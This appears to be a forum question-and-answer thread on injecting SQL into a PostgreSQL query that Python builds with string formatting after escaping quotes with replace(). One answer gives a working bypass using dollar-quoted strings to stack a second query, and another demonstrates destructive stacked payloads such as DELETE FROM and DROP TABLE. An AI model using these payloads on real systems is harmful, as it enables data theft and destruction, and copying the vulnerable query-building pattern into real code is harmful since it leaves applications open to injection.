How to exploit Python code escape string for SQLInjection in PostgreSQL

Question

Is there any way to exploit this code:

course = course.replace('\'', '\\\'')
query = "SELECT * FROM student WHERE cost_per_unit > {}".format(course)

to create a query like:
SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student WHERE column = 'ABC'

Here, Python throws a syntax error:

Syntax error at or near "\":
column = \'ABC\'

The replace() method in python replaces that. Is there any work-around so I can somehow inject something?

Answer 1

SOLUTION

Since I have to compare strings, and I cannot use ' because the replace() messes it up, I used $ dollar quoting

So the course looked like 3; SELECT * FROM student WHERE column = $$ABC$$ 3; SELECT * FROM student WHERE column = $$ABC$$

Answer 2

if course is "3; SELECT * FROM student WHERE column = 'ABC'" I don't get any syntax errors but the result might not work as valid SQL:

>>> def a(course):
...     course = course.replace('\'', '\\\'')
...     query = "SELECT * FROM student WHERE cost_per_unit > {}".format(course)
...     return query
...
>>> a("3; SELECT * FROM student WHERE column = 'ABC'")
"SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student WHERE column = \\'ABC\\'"

But the code is indeed very exploitable if other queries are possible. For this example would work just fine:

>>> a("3; SELECT * FROM student")
'SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student'

And so would these dangerous ones:

>>> a("3; DELETE FROM student")
'SELECT * FROM student WHERE cost_per_unit > 3; DELETE FROM student'
>>> a("DROP TABLE student")
'SELECT * FROM student WHERE cost_per_unit > DROP TABLE student'